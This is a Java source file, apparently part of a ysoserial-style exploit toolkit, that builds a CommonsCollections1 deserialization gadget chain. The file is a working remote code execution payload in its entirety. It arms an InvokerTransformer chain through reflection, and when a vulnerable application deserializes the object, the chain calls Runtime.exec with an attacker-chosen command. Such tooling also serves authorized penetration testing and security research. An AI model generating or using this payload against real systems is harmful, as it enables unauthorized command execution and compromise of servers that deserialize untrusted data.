package payloads;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
import payloads.annotation.Authors;
import payloads.annotation.Dependencies;
import util.PayloadRunner;
import util.Reflections;

import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.Map;

import static util.Gadgets.ANN_INV_HANDLER_CLASS;

/*
	Gadget chain:
		ObjectInputStream -> readObject()
		AnnotationInvocationHandler -> readObject()
		AbstractInputCheckedMapDecorator -> setValue()
		TransformedMap -> checkSetValue()
		ChainedTransformer -> transform()
		ConstantTransformer -> transform()
		InvokerTransformer -> transform()
		Class.getMethod() InvokerTransformer -> transform()
		Runtime.getRuntime() InvokerTransformer -> transform()
		Runtime.exec()

	Requires:
		commons-collections
 */
@SuppressWarnings({"rawtypes", "unchecked"})
@Dependencies({"commons-collections:commons-collections:3.1"})
@Authors({ Authors.CCKUAILONG })
public class CommonsCollections1_1 extends PayloadRunner implements ObjectPayload<Object> {

	public Object getObject(final String command) throws Exception {
		final String[] execArgs = new String[] { command };
		// inert chain for setup
		final Transformer transformerChain = new ChainedTransformer(
			new Transformer[]{ new ConstantTransformer(1) });
		// real chain for after setup
		final Transformer[] transformers = new Transformer[] {
				new ConstantTransformer(Runtime.class),
				new InvokerTransformer("getMethod", new Class[] {
					String.class, Class[].class }, new Object[] {
					"getRuntime", new Class[0] }),
				new InvokerTransformer("invoke", new Class[] {
					Object.class, Object[].class }, new Object[] {
					null, new Object[0] }),
				new InvokerTransformer("exec",
					new Class[] { String.class }, execArgs),
				new ConstantTransformer(1) };

		final Map innerMap = new HashMap();

		innerMap.put("value","xxxx");

		final Map transformedMap = TransformedMap.decorate(innerMap, null, transformerChain);

		Class cls = Class.forName(ANN_INV_HANDLER_CLASS);
		Constructor c = cls.getDeclaredConstructor(Class.class, Map.class);
		c.setAccessible(true);
		// Serialize Object
		Object o = c.newInstance(Retention.class, transformedMap);

		Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

		return o;
	}

	public static byte[] getBytes(final String command, Boolean fusion) throws Exception {
		return PayloadRunner.run(CommonsCollections1_1.class, command, fusion);
	}
}
